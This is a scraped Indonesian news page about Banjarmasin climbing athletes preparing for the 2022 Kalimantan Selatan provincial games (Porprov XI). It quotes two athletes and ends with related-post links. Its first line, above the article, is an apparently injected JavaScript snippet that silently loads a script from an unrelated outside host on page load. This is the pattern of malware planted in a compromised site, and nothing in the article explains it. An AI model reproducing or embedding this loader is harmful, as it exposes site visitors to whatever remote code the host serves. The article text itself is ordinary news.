(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Olahraga

Jelang Porprov XI Kalsel, Panjat Tebing Banjarmasin Andalkan Gabungan Atlet Muda-Senior


KANALKALIMANTAN.COM, BANJARMASIN – Federasi Panjat Tebing Indonesia (FPTI) Kota Banjarmasin terus memantapkan atlet mereka menjelang digelarnya Pekan Olahraga Provinsi (Porprov) XI Kalimantan Selatan 2022 bulan November mendatang di Kabupaten Hulu Sungai Selatan.

Sebanyak 25 atlet panjat tebing makin meningkatkan intensitas dan kualitas latihan. Seperti halnya seorang atlet muda panjat tebing bernama Rahmadi (22).

Rahmadi mengatakan tengah melakukan latihan rutin setiap hari untuk siap membawa harum nama cabor panjat tebing dalam laga di Kandangan itu.

“Alhamdulillah persiapan saya sudah sekitar 80 persen, masih ada sedikit latihan yang harus dimaksimalkan dan juga waktu latihannya yang diperbanyak lagi,” ungkap Rahmadi, atlet panjat tebing putera, saat diwawancarai, Selasa (25/10/2022).

 

 

Baca juga: JMSI Kalsel 2020-2025 Dilantik, Sekjend: Bangun Ekosistem Pers yang Sehat dan Profesional

Rahmadi mengaku baru sekitar satu tahun ia bergabung ke dalam cabor panjat tebing ini. Meskipun begitu ia memiliki sudah memiliki kecepatan 16 detik di kelas speed pada saat percobaan.

“Persaingan antar daerah cukup sulit untuk cabor panjat tebing, soalnya banyak bibit unggul masing-masing daerah, dan panjat tebih ini gak bisa instan harus latihan lama karena banyak teknik dan fisik yang perlu dilatih,” imbuhnya.

Pada saat latihan, para atlet diketahui mencoba semua jenis kelas yang akan diperlombakan nantinya yakni kelas speed (kecepatan), lead (tingkat kesulitan tinggi), bouldering (jalur pendek) maupun kombinasi dua kelas itu.

Seperti halnya, Siti Ruqayah, atlet perempuan yang telah menggeluti cabor panjat tebing sejak duduk di bangku kelas dua SMA.

Baca juga: Oknum Guru Cabuli Anak Murid di Banjarbaru, Kadisdik: Tak Ada Toleransi bagi Pelaku Tercela!

Ruqayah mengaku sempat vakum sekitar 5 tahun, sejak dirinya mulai mengandung. Namun, kali ini dirinya mencoba untuk berlaga kembali.

“Setelah lima tahun sempat vakum saat mengandung, kemudian saya coba berlatih kembali sejak dua tahun yang lalu, dan untuk ke Porprov Kalsel 2022 ini fokusnya sejak 6 bulan terakhir,” ujar Siti Ruqayah, atlet panjat tebing puteri, saat diwawancarai terpisah.

Adapun ketentuan berat badan menjadi salah satu yang harus ia perhatikan sebelum berlaga panjat tebing ini. Ia pun saat ini mulai menjaga asupan dan rutin mengkonsumsi buah-buahan hingga vitamin.

“Kita punya target dan harapan yang terpenting kita fokus untuk mengisi power dan tenaga untuk memaksimalnya keseimbangan dan kecepatan, semakin ringan badan semakit enak juga manjatnya,” ujarnya.

Diketahui 40 cabor akan diperlagakan dalam Porprov XI Kalsel 2022 nantinya akan digelar pada 5-13 November 2022, di Kota Kandangan, Kabupaten Hulu Sungai Selatan (HSS).

Baca juga: Enam Tersangka Kasus Narkoba Diamankan Polres Balangan

Sebanyak 25 atlet panjat tebing putera dan puteri akan diturunkan untuk berlaga tahun ini.

Saat ini semua atlet dari berbagai daerah tengah melakukan Training Center di tiga titik di Kota Banjarmasin, yakni Gor Hassanuddin, Politeknik Negeri Banjarmasin dan kampus STIEI Banjarmasin. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Lawatan ke PKB, Upaya Lisa Halaby Mencari Partai Pengusung

KANALKALIMANTAN.COM, BANJARBARU – Bakal calon Wali Kota Erna Lisa Halaby kembali melakukan lawatan politik menuju… Read More

30 menit ago

Menjaga Kamtibmas, Satgas TMMD ke-120 Berikan Penyuluhan

KANALKALIMANTAN.COM, AMUNTAI - Memberikan pemahaman kepada warga agar bersama-sama menjaga dan mewujudkan keamanan dan ketertiban… Read More

57 menit ago

RPJPD 2025-2045 Banjarbaru Menjadi Kota Metropolitan di Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Langkah menjadikan Kota Banjarbaru sebagai kota metropolitan di Provinsi Kalimantan Selatan (Kalsel)… Read More

1 jam ago

Gandeng BPS Kabupaten Banjar, DKISP Banjar Gelar Workshop Penyusunan Metadata Statistik Sektoral Lingkup Pemkab Banjar

KANALKALIMANTAN.COM, MARTAPURA - Dinas Komunikasi Informatika Statistik dan Persandian (DKISP) Kabupaten Banjar menggelar Workshop Penyusunan… Read More

1 jam ago

Jelang Penilaian Satu Wasaka Award, Bappedalitbang Mantapkan Persiapan

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar menggelar rapat… Read More

2 jam ago

Bimtek Peningkatan Kapasitas Tim Penggerak PKK Desa

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan membuka kegiatan Bimbingan… Read More

3 jam ago

This website uses cookies.